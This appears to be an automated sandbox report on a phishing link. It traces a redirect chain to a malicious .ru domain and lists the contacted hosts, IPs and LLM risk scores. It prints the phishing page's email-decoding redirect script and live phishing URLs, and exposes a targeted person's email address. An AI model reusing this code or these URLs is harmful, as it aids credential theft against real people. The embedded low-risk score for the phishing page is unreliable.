              https://www.godaddy.com/legal/agreements/cookie-policy0%Avira URL Cloudsafe
              https://a.nel.cloudflare.com/report/v4?s=IFfxEEvmd4bgv1rf9R0SUQesSlcBsdnMk0vaO8wl5VeKSAuB5bzqxCTNm4sZUsQA%2BYcYdivYdOBNPTUy3frQDVrngNbzCKpSy9qujj1nqbMQS9IrRLh7TvVAhmnExg%3D%3D0%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/mnq9zg5en0UR6op8OO6uGL6YZg61eBRuv044uU7ylswf1pghT781450%Avira URL Cloudsafe
              https://www.google.com/recaptcha/api.js0%Avira URL Cloudsafe
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D0%Avira URL Cloudsafe
              https://debssiebeads.co.ke/wp/?jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=10614750%VirustotalBrowse
              https://f8gxf.oritelos.ru/gh1gydCOQHeK528mngVzAiLyskljmHjdzQL3GdvjGBKvpweXkiITM122070%Avira URL Cloudsafe
              https://www.godaddy.com/legal/agreements/cookie-policy0%VirustotalBrowse
              https://www.google.com/recaptcha/api2/0%Avira URL Cloudsafe
              https://www.google.com/recaptcha/api.js0%VirustotalBrowse
              https://f8gxf.oritelos.ru/favicon.ico0%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/opLQsPK25rFRhKntGwA2ZNghA8uNUx4nbVsIB5YEpt451390%Avira URL Cloudsafe
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1135982147:1717061463:XHQuHvT4Va6wHyLXdOitYbqFIsyDOYHyVnGn1136xl8/88bdfe512e5d4301/f67bea3da7e6db10%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/opjc6DkU8Xus4dQkMciD0UZh1ELijK7hhF1rdvmX5P87aPDjO8cXDnccd1990%Avira URL Cloudsafe
              http://t.email1.gct.com/r/?id=hfffbb46%2Cc90b147%2Cc90b14f&jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475&p1=debssiebeads.co.ke/wp/0%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/hIzc6w/?RDian.hancock@baesystems.com0%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/pbGQlY127p6h0ts0giGGM6xrw0%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/hIzc6w/0%Avira URL Cloudsafe
              https://www.google.com/recaptcha/api2/0%VirustotalBrowse
              http://t.email1.gct.com/r/?id=hfffbb46%2Cc90b147%2Cc90b14f&jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475&p1=debssiebeads.co.ke/wp/0%VirustotalBrowse
              https://f8gxf.oritelos.ru/89Lx2AXVud2xlUwbPNlje12zdhl4A2IPyz790%Avira URL Cloudsafe
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=88bdfe512e5d43010%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/78cJa7D3fK45ClNib8mst600%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/hxfrw2DYZZsbHnkjqki9TmQkIfk5jufh48quUrIdw3ZYHOkO6r3Yenb0%Avira URL Cloudsafe
              https://cloud.google.com/recaptcha-enterprise/billing-information0%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/uvDdGeSZoeTtRzRnIUZPopyUbvj6WcjtQgkM341300%Avira URL Cloudsafe
              https://debssiebeads.co.ke/favicon.ico0%Avira URL Cloudsafe
              https://play.google.com/log?format=json&hasfast=true0%Avira URL Cloudsafe
              https://www.godaddy.com/0%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js0%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/yzSSueW3Rlb568gKDHxKxop430%Avira URL Cloudsafe
              https://play.google.com/log?format=json&hasfast=true0%VirustotalBrowse
              https://f8gxf.oritelos.ru/opoOaMVrzIDE0P1lipe1zMT613jRjCFVKN9uJkQa0A8xgdP12cMBgwt0cXabOuYMflHSHmdef2350%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/abD8xmKpqXe3def250%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/pqOKTFEEmnh8egHBG34r6Zuv400%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/yzOnhObGr29YVTEpoKHxwCt0Ttl0TsRXrtnmnc8YXG0k8Gp4YhObKRadM5FYz8Eab1800%Avira URL Cloudsafe
              https://www.godaddy.com/0%VirustotalBrowse
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/88bdfe512e5d4301/1717064447606/48c2e462596e41e6aece842ae2c08996563e372a9ba82b16283e4c2b9f90bbdc/IFmMzoC7W5cO3ct0%Avira URL Cloudsafe
              https://cloud.google.com/recaptcha-enterprise/billing-information0%VirustotalBrowse
              https://f8gxf.oritelos.ru/uvqJ1vttlOtyse1uiNXANyDnlVmnMePabfpUCdRdsK7hMtqc7ef2600%Avira URL Cloudsafe

              Download Network PCAP: filteredfull

              NameIPActiveMaliciousAntivirus DetectionReputation
              grandcirc-customer-4ki76tmy1tml-301397825.us-west-2.elb.amazonaws.com
              34.211.60.110
              truefalse
                unknown
                bg.microsoft.map.fastly.net
                199.232.214.172
                truefalse
                  unknown
                  f8gxf.oritelos.ru
                  188.114.96.3
                  truetrue
                    unknown
                    a.nel.cloudflare.com
                    35.190.80.1
                    truefalse
                      unknown
                      code.jquery.com
                      151.101.194.137
                      truefalse
                        unknown
                        d2vgu95hoyrpkh.cloudfront.net
                        13.227.219.47
                        truefalse
                          unknown
                          debssiebeads.co.ke
                          217.174.152.52
                          truefalse
                            unknown
                            challenges.cloudflare.com
                            104.17.2.184
                            truefalse
                              unknown
                              www.google.com
                              142.250.184.196
                              truefalse
                                unknown
                                fp2e7a.wpc.phicdn.net
                                192.229.221.95
                                truefalse
                                  unknown
                                  cdn.socket.io
                                  unknown
                                  unknownfalse
                                    unknown
                                    t.email1.gct.com
                                    unknown
                                    unknownfalse
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      https://f8gxf.oritelos.ru/ijadGOWmNjA7SxTV0q2ozi0cdBA9W0dAH33Z3eJlsCHRIWwOz56169false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://a.nel.cloudflare.com/report/v4?s=MoiSxzuww3vBWA14pxdaZRJmYA6faUxkXVbkS%2BCDvfvaNQNXJooN93SdQDTHpg0%2BmZp8f1%2B0jrwD15J9U1My48N1T9tY%2FXnsvCiFODAGhtnL2wxsIjGK2BQHa4ihAA%3D%3Dfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://f8gxf.oritelos.ru/web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocketfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://f8gxf.oritelos.ru/klIQ39laQFjey0i6xGLP3ZDteNpdd3cDZBKGgtt891okNrKdibFlqrS1cZWOM1UJUDFXOGwYKo5Fyz230false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://f8gxf.oritelos.ru/34HEkFr4q1WYO5T8k73FNznYijhCiUxn12JK89110false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/88bdfe512e5d4301/1717064447602/jhAXgwYP39WVSiqfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://f8gxf.oritelos.ru/12XCRnloHGipczcdhoCq68920false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://f8gxf.oritelos.ru/klpWKk32gxuOs7NipwmTvBAiwrwHsZdCtNCzija15cfNIJA8Jl2SAW0BE2ZBBrAhRNr49wx220false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://challenges.cloudflare.com/turnstile/v0/b/695da7821231/api.jsfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://debssiebeads.co.ke/wp/?jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475false
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://f8gxf.oritelos.ru/23rACQ3TWSEp90OaR5XE1xy67false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://f8gxf.oritelos.ru/mnq9zg5en0UR6op8OO6uGL6YZg61eBRuv044uU7ylswf1pghT78145false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://a.nel.cloudflare.com/report/v4?s=IFfxEEvmd4bgv1rf9R0SUQesSlcBsdnMk0vaO8wl5VeKSAuB5bzqxCTNm4sZUsQA%2BYcYdivYdOBNPTUy3frQDVrngNbzCKpSy9qujj1nqbMQS9IrRLh7TvVAhmnExg%3D%3Dfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.google.com/recaptcha/api.jsfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://f8gxf.oritelos.ru/gh1gydCOQHeK528mngVzAiLyskljmHjdzQL3GdvjGBKvpweXkiITM12207false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://f8gxf.oritelos.ru/favicon.icofalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://debssiebeads.co.ke/wp/?jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475#?email=aWFuLmhhbmNvY2tAYmFlc3lzdGVtcy5jb20=true
                                        unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normalfalse
                                          unknown
                                          https://f8gxf.oritelos.ru/opLQsPK25rFRhKntGwA2ZNghA8uNUx4nbVsIB5YEpt45139false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1135982147:1717061463:XHQuHvT4Va6wHyLXdOitYbqFIsyDOYHyVnGn1136xl8/88bdfe512e5d4301/f67bea3da7e6db1false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://f8gxf.oritelos.ru/opjc6DkU8Xus4dQkMciD0UZh1ELijK7hhF1rdvmX5P87aPDjO8cXDnccd199false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://f8gxf.oritelos.ru/hIzc6w/?RDian.hancock@baesystems.comfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://t.email1.gct.com/r/?id=hfffbb46%2Cc90b147%2Cc90b14f&jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475&p1=debssiebeads.co.ke/wp/false
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://f8gxf.oritelos.ru/pbGQlY127p6h0ts0giGGM6xrwfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://f8gxf.oritelos.ru/hIzc6w/true
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://f8gxf.oritelos.ru/89Lx2AXVud2xlUwbPNlje12zdhl4A2IPyz79false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=88bdfe512e5d4301false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://f8gxf.oritelos.ru/hxfrw2DYZZsbHnkjqki9TmQkIfk5jufh48quUrIdw3ZYHOkO6r3Yenbfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://f8gxf.oritelos.ru/78cJa7D3fK45ClNib8mst60false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://f8gxf.oritelos.ru/uvDdGeSZoeTtRzRnIUZPopyUbvj6WcjtQgkM34130false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGtrue
                                            unknown
                                            https://debssiebeads.co.ke/favicon.icofalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://ipinfo.io/false
                                            • URL Reputation: safe
                                            unknown
                                            https://cdn.socket.io/4.6.0/socket.io.min.jsfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://f8gxf.oritelos.ru/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://f8gxf.oritelos.ru/yzSSueW3Rlb568gKDHxKxop43false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://f8gxf.oritelos.ru/opoOaMVrzIDE0P1lipe1zMT613jRjCFVKN9uJkQa0A8xgdP12cMBgwt0cXabOuYMflHSHmdef235false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG#true
                                              unknown
                                              https://f8gxf.oritelos.ru/abD8xmKpqXe3def25false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://f8gxf.oritelos.ru/hIzc6w/#Dian.hancock@baesystems.comtrue
                                                unknown
                                                https://f8gxf.oritelos.ru/pqOKTFEEmnh8egHBG34r6Zuv40false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://f8gxf.oritelos.ru/yzOnhObGr29YVTEpoKHxwCt0Ttl0TsRXrtnmnc8YXG0k8Gp4YhObKRadM5FYz8Eab180false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/88bdfe512e5d4301/1717064447606/48c2e462596e41e6aece842ae2c08996563e372a9ba82b16283e4c2b9f90bbdc/IFmMzoC7W5cO3ctfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://f8gxf.oritelos.ru/uvqJ1vttlOtyse1uiNXANyDnlVmnMePabfpUCdRdsK7hMtqc7ef260false
                                                • Avira URL Cloud: safe
                                                unknown
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://www.godaddy.com/legal/agreements/privacy-policy?target=_blankchromecache_109.2.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://developers.google.com/recaptcha/docs/faq#localhost_supportchromecache_89.2.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://sso.godaddy.com/v1/account/reset?app=o365&amp;realm=passchromecache_109.2.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.gstatic.c..?/recaptcha/releases/DH3nyJMamEclyfe-nztbfV8S/recaptcha__.chromecache_89.2.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://support.google.com/recaptcha#6262736chromecache_89.2.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://f8gxf.oritelos.ru/hIzc6w/#Dchromecache_93.2.drtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://support.google.com/recaptcha/?hl=en#6223828chromecache_89.2.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://cloud.google.com/contactchromecache_89.2.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.godaddy.com/legal/agreements/cookie-policychromecache_109.2.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://support.google.com/recaptcha/#6175971chromecache_89.2.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://www.google.com/recaptcha/api2/chromecache_89.2.dr, chromecache_66.2.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://support.google.com/recaptchachromecache_89.2.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://cloud.google.com/recaptcha-enterprise/billing-informationchromecache_89.2.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://recaptcha.netchromecache_89.2.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://www.apache.org/licenses/chromecache_89.2.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-quechromecache_89.2.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://play.google.com/log?format=json&hasfast=truechromecache_89.2.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.godaddy.com/chromecache_109.2.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-recachromecache_89.2.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                142.250.184.196
                                                www.google.comUnited States
                                                15169GOOGLEUSfalse
                                                239.255.255.250
                                                unknownReserved
                                                unknownunknownfalse
                                                34.211.60.110
                                                grandcirc-customer-4ki76tmy1tml-301397825.us-west-2.elb.amazonaws.comUnited States
                                                16509AMAZON-02USfalse
                                                217.174.152.52
                                                debssiebeads.co.keBulgaria
                                                31083TELEPOINTBGfalse
                                                142.250.181.228
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                188.114.96.3
                                                f8gxf.oritelos.ruEuropean Union
                                                13335CLOUDFLARENETUStrue
                                                151.101.194.137
                                                code.jquery.comUnited States
                                                54113FASTLYUSfalse
                                                35.190.80.1
                                                a.nel.cloudflare.comUnited States
                                                15169GOOGLEUSfalse
                                                104.17.2.184
                                                challenges.cloudflare.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                13.227.219.47
                                                d2vgu95hoyrpkh.cloudfront.netUnited States
                                                16509AMAZON-02USfalse
                                                IP
                                                192.168.2.4
                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1449494
                                                Start date and time:2024-05-30 12:19:42 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 3m 22s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:browseurl.jbs
                                                Sample URL:http://t.email1.gct.com/r/?id=hfffbb46%2Cc90b147%2Cc90b14f&jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475&p1=debssiebeads.co.ke/wp/#?email=aWFuLmhhbmNvY2tAYmFlc3lzdGVtcy5jb20=
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:8
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal80.phis.win@20/77@26/11
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 142.250.186.163, 142.250.185.142, 74.125.133.84, 34.104.35.123, 40.68.123.157, 199.232.214.172, 192.229.221.95, 52.165.164.15, 20.166.126.56, 142.250.184.195, 172.217.18.106, 142.250.74.202, 172.217.16.138, 142.250.186.170, 142.250.186.138, 172.217.16.202, 172.217.18.10, 142.250.185.74, 142.250.186.74, 142.250.185.106, 142.250.181.234, 142.250.186.106, 142.250.185.138, 142.250.186.42, 142.250.184.202, 216.58.206.74, 142.250.185.67
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, grandcirclecorporation-mid-prod2-cus.campaign.adobe.com, clients.l.google.com, www.gstatic.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                No simulations
                                                InputOutput
                                                URL: https://debssiebeads.co.ke/wp/?jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475#?email=aWFuLmhhbmNvY2tAYmFlc3lzdGVtcy5jb20= Model: gpt-4o
                                                ```json
                                                {
                                                  "riskscore": 8,
                                                  "reasons": "The code extracts a base64-encoded email parameter from the URL, decodes it, and then redirects the user to a potentially suspicious URL ('https://f8gxf.oritelos.ru/hIzc6w/#D' + email). This behavior is indicative of phishing or other malicious activity, as it involves capturing user information and redirecting to an untrusted domain."
                                                }
                                                // Function to get the value of a parameter from the URL
                                                        function getParameterByName(name, url) {
                                                            if (!url) url = window.location.href;
                                                            name = name.replace(/[\[\]]/g, "\\$&");
                                                            var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),
                                                                results = regex.exec(url);
                                                            if (!results) return null;
                                                            if (!results[2]) return '';
                                                            return decodeURIComponent(results[2].replace(/\+/g, " "));
                                                        }
                                                        var base64EmailParam = getParameterByName('email');
                                                        function decodeEmail(base64Email) {
                                                            return atob(base64Email);
                                                        }
                                                        if (base64EmailParam) {
                                                            var email = decodeEmail(base64EmailParam);
                                                            setTimeout(function () {
                                                                window.location.href = 'https://f8gxf.oritelos.ru/hIzc6w/#D' + email;
                                                            }, 1000);
                                                        }
                                                URL: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normal Model: gpt-4o
                                                ```json
                                                {
                                                  "riskscore": 1,
                                                  "reasons": "The provided JavaScript code appears to be part of a Cloudflare challenge mechanism, which is used to protect websites from malicious traffic and bots. It includes configuration settings and a message handler for communication with the Cloudflare service. There are no signs of malicious activity such as data exfiltration, unauthorized access, or harmful actions. The code is legitimate and poses minimal risk."
                                                }
                                                (function(){
                                                            window._cf_chl_opt={
                                                                cvId: '3',
                                                                cZone: 'challenges.cloudflare.com',
                                                                cTplV: 5,
                                                                chlApivId: '0',
                                                                chlApiWidgetId: 'fetwl',
                                                                chlApiSitekey: '0x4AAAAAAAbKSXjZm5zNeGX0',
                                                                chlApiMode: 'managed',
                                                                chlApiSize: 'normal',
                                                                chlApiRcV: '1/tQLO-891kd51BCz',
                                                                chlApiTimeoutEncountered: 0,
                                                                chlTimeoutMs: 120000,
                                                                cK: "visitor-time",
                                                                cType: 'chl_api_m',
                                                                cNounce: '24789',
                                                                cRay: '88bdfe512e5d4301',
                                                                cHash: 'f67bea3da7e6db1',
                                                                cFPWv: 'b',
                                                                cLt: 'n',
                                                                cRq: {
                                                                    ru: 'aHR0cDovL2NoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20vY2RuLWNnaS9jaGFsbGVuZ2UtcGxhdGZvcm0vaC9iL3R1cm5zdGlsZS9pZi9vdjIvYXYwL3JjdjAvMC9mZXR3bC8weDRBQUFBQUFBYktTWGpabTV6TmVHWDAvYXV0by9ub3JtYWw=',
                                                                    ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2',
                                                                    rm: 'R0VU',
                                                                    d: 'dw2QgXVRmWEUva+siMez0z39H3Y1THoLCV9mT+Vb0hzUwrZqk5ZP4vKM8bQjo1XF+i/DRTamW6tGqnPKqcCGC+k7ICkixCCGCs0Hx1ZQk5iS2b7CsFnumOzLJ+OAV6FVDCDs3/5SuK1GdqBjGJm+6xPuHWp3s/nLJYBRMa245tfsfTsbYHiiz1iXRgcretoeyvWm9ziJt6nkrTKDMRCzFEa2aHYuWlqtN1GD0BlX6ksyA3XO9UrEwxms07U3NYapBaJYX/J2VUMZruhIkl0tCJ2+FSuK6bb2dqrsCGCcryzh403qMXZ+Yw20iksq0Kz/KRjyPHhGn/YuhT14qx3RBvN9K/txlE0phVjDdwiFWsvQSp+Xv/WDk5ELADdxFR01AOhkIGSFUdX8o0mzdD/mDqx87nI8JHDOssyoAbNLXR3egmDHHj2NArXezHlmDh5RCYiS5K4teApFmntlXbT3hvkqtLi77r4gew+7cIUQkBLwZof4Gv4ecvo/JKgVp9GMN596NAK1u0etABDBnrDdDWP9TZh+tCmsGBLRL21dBA8ii9Gj6DI1+wQYdT7Iuk1L+rCE4XS/cntI5iY40bxI1vrWiLN2KA8dpO8RNrurO7EyHIeijVZJfi/XNC3CYKRlcvh0HQuWfZo3OatHd3wfaVAv+i3yYiH5MT+kGU0zphw=',
                                                                    t: 'MTcxNzA2NDQ0NS42MzY=',
                                                                    m: 'woPSZeulT5Gs8UApgXgj5DejcNNOuyp7reu5yQVsNpk=',
                                                                    i1: '6fTg5IfC24/nyKydg3dnjQ==',
                                                                    i2: '/TFlgCJq2yj9ZgerkbWQjQ==',
                                                                    uh: 'wh0E0SXYnx6pTBdJW/l926I+PRUplRdtQz3K9lHXs/s=',
                                                                    hh: 'WCiLdNo2uN2aXsfJJhG2HFkP3bOo0fw8tsFAppLisvs=',
                                                                    zh: '9D+zbxCfwBPyr1pF5Wb5E9kRItcGU2xCgzO1zGTKToQ=',
                                                                },
                                                                refresh: function(){
                                                                    if(window['parent']){
                                                                        window['parent'].postMessage({
                                                                            source: 'cloudflare-challenge',
                                                                            widgetId: 'fetwl',
                                                                            nextRcV: '1/tQLO-891kd51BCz',
                                                                            event: 'reloadRequest',
                                                                        }, "*");
                                                                    }
                                                                }
                                                            };
                                                            var handler = function(event) {
                                                                var e = event.data;
                                                                if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidget
                                                URL: https://f8gxf.oritelos.ru/hIzc6w/#Dian.hancock@baesystems.com Model: gpt-4o
                                                ```json
                                                {
                                                  "riskscore": 2,
                                                  "reasons": "The provided JavaScript code includes base64-encoded content that, when decoded, reveals the inclusion of external scripts from known sources (jQuery and Cloudflare). The code also contains HTML and CSS for styling a webpage. There are hidden input fields with values that could potentially be used for tracking or other purposes, but there are no clear signs of malicious activity such as phishing attempts, data exfiltration, or harmful payloads. The risk score is low, but caution is advised due to the presence of hidden elements."
                                                }
